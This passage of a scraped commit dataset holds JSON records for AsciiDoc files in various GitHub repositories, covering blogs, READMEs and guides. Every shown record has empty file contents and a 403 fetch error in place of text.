2018-03-15-try-ecr.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-15-try-ecr.adoc","new_file":"_posts\/2018-03-15-try-ecr.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e0954166b8b9055e60083577f184e238975d0417","subject":"Update 2020-01-31-secrets.adoc","message":"Update 2020-01-31-secrets.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2020-01-31-secrets.adoc","new_file":"_posts\/2020-01-31-secrets.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"182e294bf1745c89de8cf460ea010967eddcc71c","subject":"Blog about protobuf decoder RPM","message":"Blog about protobuf decoder RPM\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2019-06-18-debezium-wears-fedora.adoc","new_file":"blog\/2019-06-18-debezium-wears-fedora.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7e4a725139c385cf6312821dbd23f41c6cd7fc17","subject":"Delete README-ko.adoc","message":"Delete README-ko.adoc","repos":"gsha0\/hubpress.io,gsha0\/hubpress.io,gsha0\/hubpress.io,gsha0\/hubpress.io","old_file":"README-ko.adoc","new_file":"README-ko.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gsha0\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fd33541bf056986f178eb117998b5c4a02381519","subject":"Delete the file at '_posts\/2015-05-26-TEST.adoc'","message":"Delete the file at '_posts\/2015-05-26-TEST.adoc'","repos":"hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io","old_file":"_posts\/2015-05-26-TEST.adoc","new_file":"_posts\/2015-05-26-TEST.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hoernschen\/hoernschen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ad7b9407a0c99682bd1556ffcd45810ff892ddf","subject":"Update 2016-11-26-Todo.adoc","message":"Update 2016-11-26-Todo.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-11-26-Todo.adoc","new_file":"_posts\/2016-11-26-Todo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"07abfe49422febe095617859cda984efc8a18a20","subject":"Update 2017-07-07-Lazy-programmers-catching-my-eye.adoc","message":"Update 2017-07-07-Lazy-programmers-catching-my-eye.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-07-07-Lazy-programmers-catching-my-eye.adoc","new_file":"_posts\/2017-07-07-Lazy-programmers-catching-my-eye.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c8d60380cfc99dc3cbe4572d806c64c1be51aa0b","subject":"Dynamodb guide","message":"Dynamodb guide\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/dynamodb-guide.adoc","new_file":"docs\/src\/main\/asciidoc\/dynamodb-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"da8496406e37da856489687dd5e9888188a2fa59","subject":"Update Ruby.adoc","message":"Update Ruby.adoc","repos":"smru\/Documentation,smru\/Documentation","old_file":"Linux\/Ruby.adoc","new_file":"Linux\/Ruby.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smru\/Documentation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"17a5d3276cff87fd34c77b22845076f7e6ff7a62","subject":"Publish 2016-08-27.adoc","message":"Publish 2016-08-27.adoc","repos":"apalkoff\/apalkoff.github.io,apalkoff\/apalkoff.github.io,apalkoff\/apalkoff.github.io,apalkoff\/apalkoff.github.io","old_file":"2016-08-27.adoc","new_file":"2016-08-27.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apalkoff\/apalkoff.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d8af6e259abfd6ece5e34b1efc7046252913479","subject":"Publish 2016-11-10.adoc","message":"Publish 2016-11-10.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"2016-11-10.adoc","new_file":"2016-11-10.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dc2f70d71e8eb46be08e8c21b4e1bd8a009e7084","subject":"Add readme","message":"Add readme\n","repos":"clbr\/urlmatch,clbr\/urlmatch","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clbr\/urlmatch.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"64792a4161bf0ad611c7d37cced6e58bee3e7e3d","subject":"y2b create post 3 Cool Tech Deals - #12","message":"y2b create post 3 Cool Tech Deals - #12","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-12-30-3-Cool-Tech-Deals--12.adoc","new_file":"_posts\/2015-12-30-3-Cool-Tech-Deals--12.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d74ff1debb9112b8cef014418805eb0014b2b32","subject":"add 7 git commit messages","message":"add 7 git commit messages\n","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"PracticalTips.adoc","new_file":"PracticalTips.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"bae1bd80ba44fb36ee962b67b5a5bf20bcd4158e","subject":"Update 2017-02-02-Modelando-um-Exercito.adoc","message":"Update 2017-02-02-Modelando-um-Exercito.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-02-02-Modelando-um-Exercito.adoc","new_file":"_posts\/2017-02-02-Modelando-um-Exercito.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2969e2758af3ac611d1a4ff556220e1c066dd321","subject":"Update 2017-06-06-IP-Addresses-in-Azure.adoc","message":"Update 2017-06-06-IP-Addresses-in-Azure.adoc","repos":"fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io","old_file":"_posts\/2017-06-06-IP-Addresses-in-Azure.adoc","new_file":"_posts\/2017-06-06-IP-Addresses-in-Azure.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fasigpt\/fasigpt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2dbc0846802bfc19391c46820750919a1423a17b","subject":"Update 2017-06-22-A-Disjuncao-no-Prolog.adoc","message":"Update 2017-06-22-A-Disjuncao-no-Prolog.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-06-22-A-Disjuncao-no-Prolog.adoc","new_file":"_posts\/2017-06-22-A-Disjuncao-no-Prolog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4b5f9dd3c98927e7e56714af7bb9e2ebf8362538","subject":"Update 2017-09-17-mixed-content-checker.adoc","message":"Update 2017-09-17-mixed-content-checker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-17-mixed-content-checker.adoc","new_file":"_posts\/2017-09-17-mixed-content-checker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"37601a9df7c0f0ad09a85b7cc332f35e367905bb","subject":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","message":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","repos":"JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io","old_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JithinPavithran\/JithinPavithran.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1d28a2bfb0f523897d6954f8d78a1bf39a747b01","subject":"Update 2019-01-18-Laravel-Pusher-Pushjs.adoc","message":"Update 2019-01-18-Laravel-Pusher-Pushjs.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-01-18-Laravel-Pusher-Pushjs.adoc","new_file":"_posts\/2019-01-18-Laravel-Pusher-Pushjs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f03c6950f2fffac67203596d92746d603279a50","subject":"Update 2016-03-24-The-Programmers-Oath-and-my-perspective.adoc","message":"Update 2016-03-24-The-Programmers-Oath-and-my-perspective.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2016-03-24-The-Programmers-Oath-and-my-perspective.adoc","new_file":"_posts\/2016-03-24-The-Programmers-Oath-and-my-perspective.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f8d7904041eed41477b4d1263c4523104b598a12","subject":"Add README for Jenetics basic module.","message":"Add README for Jenetics basic module.\n","repos":"jenetics\/jenetics,jenetics\/jenetics,jenetics\/jenetics,jenetics\/jenetics,jenetics\/jenetics,jenetics\/jenetics,jenetics\/jenetics","old_file":"jenetics\/README.adoc","new_file":"jenetics\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenetics\/jenetics.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ff255c59ef82d663e8cc715165fc62c4a343fbb1","subject":"disable updates in Fedora 21 installation example","message":"disable updates in Fedora 21 installation example\n","repos":"kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core","old_file":"trex_book.asciidoc","new_file":"trex_book.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d66c6372d31812e9ecd8c94b55ac0c1801af2824","subject":"Update 2016-06-03-Benchmarking.adoc","message":"Update 2016-06-03-Benchmarking.adoc","repos":"erramuzpe\/gsoc2016,erramuzpe\/gsoc2016,erramuzpe\/gsoc2016,erramuzpe\/gsoc2016","old_file":"_posts\/2016-06-03-Benchmarking.adoc","new_file":"_posts\/2016-06-03-Benchmarking.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/erramuzpe\/gsoc2016.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9507140df9a8c1aa2f991abda6d48cd332e9f1bc","subject":"Update 2019-11-23-one-year-later-2.adoc","message":"Update 2019-11-23-one-year-later-2.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2019-11-23-one-year-later-2.adoc","new_file":"_posts\/2019-11-23-one-year-later-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c8b8d16ea950e8eea9492fa4c400f09d472a505d","subject":"Update 1993-11-17.adoc","message":"Update 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/1993-11-17.adoc","new_file":"_posts\/1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c5ec5b76e5b9ea453a36a7928d92e6ffe736ee3e","subject":"Update 2014-11-24-Episode-13-The-Anniversary.adoc","message":"Update 2014-11-24-Episode-13-The-Anniversary.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2014-11-24-Episode-13-The-Anniversary.adoc","new_file":"_posts\/2014-11-24-Episode-13-The-Anniversary.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1187c62b4208a347512d476f774cc9cbe2f9cd85","subject":"Delete the file at '_posts\/2016-03-04-New-System.adoc'","message":"Delete the file at '_posts\/2016-03-04-New-System.adoc'","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2016-03-04-New-System.adoc","new_file":"_posts\/2016-03-04-New-System.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"25dbfbe189b16ec28ffe6c3c273212e35a0cfc31","subject":"Update 2016-06-10-Log-Zoom-Filebeat.adoc","message":"Update 2016-06-10-Log-Zoom-Filebeat.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-10-Log-Zoom-Filebeat.adoc","new_file":"_posts\/2016-06-10-Log-Zoom-Filebeat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c5d9e8aed7ac4f98595110cf796cf0f53c41f142","subject":"Update 2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","message":"Update 2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","new_file":"_posts\/2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"20feab3e89552a5b156e9df6733d45abd8d3c237","subject":"Update 2014-08-14-Consistency-of-choices.adoc","message":"Update 2014-08-14-Consistency-of-choices.adoc","repos":"wanjee\/wanjee.github.io,wanjee\/wanjee.github.io,wanjee\/wanjee.github.io","old_file":"_posts\/2014-08-14-Consistency-of-choices.adoc","new_file":"_posts\/2014-08-14-Consistency-of-choices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wanjee\/wanjee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b8167ae6b7f104ebda2b799d743a0e01fbd5168","subject":"Update 2016-04-11-Buffer-Overflow-basico.adoc","message":"Update 2016-04-11-Buffer-Overflow-basico.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-11-Buffer-Overflow-basico.adoc","new_file":"_posts\/2016-04-11-Buffer-Overflow-basico.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"00c7b1c5ad35b0af82991a89630c297c882d0a1f","subject":"Start documentation for Model","message":"Start documentation for Model\n","repos":"soslan\/skjs,soslan\/skjs,soslan\/skjs","old_file":"docs\/model.adoc","new_file":"docs\/model.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/soslan\/skjs.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e448b2b24fa5abf305f349ce61b5db1dc10c0f25","subject":"fixed formatting","message":"fixed formatting\n","repos":"couchbaselabs\/Workshop,couchbaselabs\/Workshop,couchbaselabs\/Workshop","old_file":"connect2016\/developer\/README.adoc","new_file":"connect2016\/developer\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/couchbaselabs\/Workshop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ec5e5cf2cbe79d437c4d7edcee1f8ab521b22a2d","subject":"y2b create post The Military Tough MacBook!","message":"y2b create post The Military Tough MacBook!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-16-The-Military-Tough-MacBook.adoc","new_file":"_posts\/2016-08-16-The-Military-Tough-MacBook.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f278c74c7c6e5bb3c08f8964dec6b8e25034394","subject":"Update 2016-11-20-The-Importance-of-Research.adoc","message":"Update 2016-11-20-The-Importance-of-Research.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-11-20-The-Importance-of-Research.adoc","new_file":"_posts\/2016-11-20-The-Importance-of-Research.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"92d22598d85204b1f334d5606e609a209314786d","subject":"Update 2016-07-29-kanban.adoc","message":"Update 2016-07-29-kanban.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-29-kanban.adoc","new_file":"_posts\/2016-07-29-kanban.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c273eb9f3c0a72a3a6b01aea82ba31cc362cadd1","subject":"Redund expl","message":"Redund expl\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Objects & interfaces\/README.adoc","new_file":"Objects & interfaces\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4d8ea8584908d0262bdafabb038db0b746eb815b","subject":"y2b create post DON'T Buy The Google Pixel Buds","message":"y2b create post DON'T Buy The Google Pixel Buds","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-07-DON'T%20Buy%20The%20Google%20Pixel%20Buds.adoc","new_file":"_posts\/2018-02-07-DON'T%20Buy%20The%20Google%20Pixel%20Buds.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"203ba909fbd1912e5815516db7792c900338a9c2","subject":"Update 2016-08-01-Test-Post.adoc","message":"Update 2016-08-01-Test-Post.adoc","repos":"DavidTPate\/davidtpate.com,DavidTPate\/davidtpate.com,DavidTPate\/davidtpate.com,DavidTPate\/davidtpate.com","old_file":"_posts\/2016-08-01-Test-Post.adoc","new_file":"_posts\/2016-08-01-Test-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DavidTPate\/davidtpate.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a094ddefbf3c3658bbb7263f591d2be65d859c68","subject":"Update 2017-04-20-Back-Home.adoc","message":"Update 2017-04-20-Back-Home.adoc","repos":"mcornell\/OFM,mcornell\/OFM,mcornell\/OFM,mcornell\/OFM","old_file":"_posts\/2017-04-20-Back-Home.adoc","new_file":"_posts\/2017-04-20-Back-Home.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mcornell\/OFM.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9edfe32910f76798440461be6a2dbf0c5488bf66","subject":"Shared AOT Cache","message":"Shared AOT Cache\n","repos":"clojure\/clojurescript-site","old_file":"content\/news\/2018-03-12-shared-aot-cache.adoc","new_file":"content\/news\/2018-03-12-shared-aot-cache.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"5655673246555af8579dc82f8d1c696d09af41ec","subject":"Update 2015-04-15-mon-blog.adoc","message":"Update 2015-04-15-mon-blog.adoc","repos":"yoanndupuy\/yoanndupuy.github.io,yoanndupuy\/yoanndupuy.github.io,yoanndupuy\/yoanndupuy.github.io","old_file":"_posts\/2015-04-15-mon-blog.adoc","new_file":"_posts\/2015-04-15-mon-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yoanndupuy\/yoanndupuy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2076d6dbfff74cfc67d3a97a99c01695a9f02153","subject":"SWARM-1650: documentation of datasources should include validation settings (#685)","message":"SWARM-1650: documentation of datasources should include validation settings (#685)\n\nMotivation\r\n----------\r\nThe `datasources` fraction documentation should include full examples\r\nof datasource configuration as shown in EAP documentation:\r\nhttps:\/\/access.redhat.com\/documentation\/en-us\/red_hat_jboss_enterprise_application_platform\/7.0\/html\/configuration_guide\/datasource_management#example_datasource_configurations\r\n\r\nThis mainly includes connection validation settings, which is\r\nimportant in case a DB temporarily goes away and then returns back.\r\n\r\nModifications\r\n-------------\r\nAdded examples of MySQL, PostgreSQL and Oracle datasources, showing\r\nall the configuration options included in the EAP documentation.\r\n\r\nResult\r\n------\r\nMore complete documentation for datasources.","repos":"nelsongraca\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,juangon\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,nelsongraca\/wildfly-swarm,nelsongraca\/wildfly-swarm,juangon\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,nelsongraca\/wildfly-swarm,kenfinnigan\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,kenfinnigan\/wildfly-swarm,kenfinnigan\/wildfly-swarm,juangon\/wildfly-swarm,juangon\/wildfly-swarm,kenfinnigan\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,nelsongraca\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,kenfinnigan\/wildfly-swarm,juangon\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,wildfly-swarm\/wildfly-swarm-core","old_file":"fractions\/javaee\/datasources\/README.adoc","new_file":"fractions\/javaee\/datasources\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wildfly-swarm\/wildfly-swarm.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"77a23179e18117ee54c201f1a38c646c4c16097b","subject":"Added user journey for Heroku","message":"Added user journey for Heroku\n","repos":"crispab\/codekvast,crispab\/codekvast,crispab\/codekvast,crispab\/codekvast,crispab\/codekvast,crispab\/codekvast","old_file":"product\/docs\/src\/docs\/asciidoc\/HerokuUserJourney.adoc","new_file":"product\/docs\/src\/docs\/asciidoc\/HerokuUserJourney.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crispab\/codekvast.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e24202c1e2cff137825e9b518186c2de35eac9f4","subject":"Update 2016-05-05-deleted.adoc","message":"Update 2016-05-05-deleted.adoc","repos":"sgalles\/sgalles.github.io,sgalles\/sgalles.github.io,sgalles\/sgalles.github.io,sgalles\/sgalles.github.io","old_file":"_posts\/2016-05-05-deleted.adoc","new_file":"_posts\/2016-05-05-deleted.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sgalles\/sgalles.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bb2c6fcfa769962ac8edeb34e552eaa069dc4e46","subject":"Update 2018-10-31-H-T-M-L.adoc","message":"Update 2018-10-31-H-T-M-L.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-31-H-T-M-L.adoc","new_file":"_posts\/2018-10-31-H-T-M-L.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"762cf17a38f1366687fd7c3fbe565ce6a8e32956","subject":"Wording S9","message":"Wording S9\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Divers\/Extractor.adoc","new_file":"Divers\/Extractor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7ab147afb7c506ab018e26da694ae91dbe1e2d40","subject":"Proposal of plan-based quota check, scaling and 